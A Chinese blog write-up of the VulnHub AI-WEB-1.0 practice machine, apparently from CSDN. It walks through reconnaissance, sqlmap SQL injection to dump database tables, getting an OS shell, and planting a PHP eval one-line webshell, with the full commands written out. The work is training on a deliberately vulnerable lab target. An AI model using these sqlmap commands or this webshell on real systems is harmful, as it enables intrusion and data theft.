AI-WEB-1.0获取shell

最新推荐文章于 2024-09-10 15:07:55 发布
最新推荐文章于 2024-09-10 15:07:55 发布
阅读量744 收藏 6
点赞数 23
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/140752953
版权

攻击机kali IP:192.168.48.130

靶机 AI-WEB-1.0 IP:?

信息收集

c段扫描

arp-scan

-l 扫描c段

这里可以分析到靶机IP:192.168.110.138

对靶机进一步扫描

对端口进行扫描

使用nmap -sV -v -T4 对靶机扫描

扫描发现只开放了80端口

对网页进一步扫描

访问没有什么信息

使用dirb 对网页进一步扫描

dirb "http://192.168.110.134/"

尝试发现robots.txt中有内容

访问发现/m3diNf0/不能正常访问

/se3reTdir777/uploads/ 不能访问页面

使用dirb 对/m3diNf0和/se3reTdir777扫描

发现是phpinfo的页面

再扫描se3reTdir777

dirb "http://192.168.110.134/se3reTdir777"

发现新的index.php 访问

发现是查询页面 考虑sql注入

输入’报错发现sql注入漏洞

漏洞利用

sqlmap的使用

这里利用burp抓包得到以下的包

通过抓包得到注入点uid=1&Operation=Submit

使用sqlmap

注入页面为http://192.168.110.134/se3reTdir777/index.php

注入点为uid=1&Operation=Submit

--dbs 列出数据库

sqlmap -u  "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs

得到了

aiweb1

information_schema 两个数据库

-D 指定数据库 aiweb1

--tables 列出表名

sqlmap -u  "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables

得到 user systemUser 两个表名

再通过-T 指定表名user

--columns 列出字段

sqlmap -u  "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns

得到 firstName id lastName 3个字段

再-C 指定字段 id

--dump 获取字段中的数据

sqlmap -u  "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump

获取shell

sqlmap -u "http://192.168.48.134/se3reTdir777/" --data "uid=1&Operation=Submit"  --os-shell

选2自定义路径

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

连接成功

上传一句话木马

<?php @eval($_POST['zx'])?>

sqlmap -u "http://192.168.48.134/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

蚁剑连接

mouyu⇔
关注
AI-Web-1.0靶场
qq_46187131的博客
03-27 1435
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4309
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
AI-web-1.0
weixin_71053667的博客
07-29 255
3.在kali桌面写一句话木马文件,用 sqlmap 工具写入一句话木马。–file-dest:后面加要存放文件的地址。–file-write:去读取木马文件。2.使用kali,用sqlmap跑。3.直接使用--os-shell。1.打开靶机,扫端口目录。在os-shell查看。
VulnHub 靶机系列之AI-Web-1.0
最新发布
2302_76838247的博客
09-10 2291
kali机下载地址(选择第一个下载,3G大小。
AI-WEB-1.0
底层社会中的弱智
08-03 656
总结: 报错注入常见的十种,本次用的是updatexml 获取os-sh的条件,具有可写权限的绝对路径需要自己拼接 使用openssl passwd -1 salt xxx xxx构造hash 目标主机为192.168.49.158 攻击kali机为192.168.49.129 前期的信息收集,端口服务,目录扫描,web框架等 端口服务: 只开放80端口且存在两个目录 访问web页面,使用nikto和dirb针对主机和目录进行探测: 主页和前端源码没有提供信息 查看下目录
VulnHub靶场之AI Web 1.0
A_dmin的博客
05-20 644
VulnHub靶场之AI Web 1.0 废话不多说,直接开始实验,都是老套路起步了 用vm打开靶机,运行kali和靶机 首先肯定查看kali的ip地址,然后使用nmap命令:nmap -sP 192.168.80.0/24扫描主机: 找到了靶机的IP地址,接下来进行端口扫描 nmap命令:nmap -p 1-65535 -sV 192.168.80.129 发现只开了一个80端口,我们进行访...
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2431
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
记录一次vulnhub:AI-WEB-1.0靶场复现
sszsNo1的博客
06-24 283
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6736
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
vulnhub靶机AI-WEB-1.0渗透测试
Long_gone的博客
09-29 1682
首先用netdiscover工具扫描一下靶机IP: netdiscover 由经验推断出靶机IP为:192.168.34.228,接着使用nmap工具扫描一下靶机端口的开放情况: nmap -sV -p 0-65535 192.168.34.228 发现靶机只开放了80端口,然后访问一下看看: 然后试一下目录爆破: dirb http://192.168.34.228 发现robot...
AI-WEB-1.0 靶机
weixin_53736204的博客
07-29 506
下载地址:下载压缩文件打开开启虚拟机。
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2782
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0详细教程
2301_76631050的博客
07-29 474
这里2.php存放在/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/下。Ctrl+f 搜索一下/m3diNf0/,发现了路径:/home/www/html/web1x443290o2sdf92213/我们需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为。我们接下来的思路是写入木马,但是需要一个可写入路径需要我们找一下。上面我们扫到的目录有好几个不能访问,我们需要深入对他们扫描一下。
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 3352
AI-WEB-1.0 多方法渗透
靶机通关|AI-WEB-1.0 靶机通关攻略
a96482的博客
07-30 782
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php。python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump。中发现提交框,开始尝试注入。写入成功,使用蚁剑连接。连接成功,通关完成。
【HCIA-Datacom V1.0培训教材】网络管理与运维
QQ317693347的博客
07-25 1550
•NETCONF使用SSH实现安全传输,使用RPC(RemoteProcedureCall,远程过程调用)实。•NETCONF服务器端(Server)Server用于维护被管理设备的信息数据并响应Client的请求,▫1996年,IETF颁布了RFC1901,定义了SNMP的第二个版本SNMPv2c。他事件时,Server利用Notification机制将设备的告警和事件通知给Client,向网络管理系统。▫ifOperStasuts接口当前的操作状态,即接口的链路层协议状态1,Up;...
AI-WEB-1.0靶机渗透教程 文件上传漏洞
qq_48368964的博客
07-29 265
简单的扫描目录 扫出来两个 分别进去看看发现里面有两个接着扫描下第一个目录 发现了info.php文件。
Ai-web-1.0靶机中的骚操作
weixin_51692662的博客
11-05 383
sqlmap、反弹shell、passwd提权、Ai-web-1.0
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1553
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值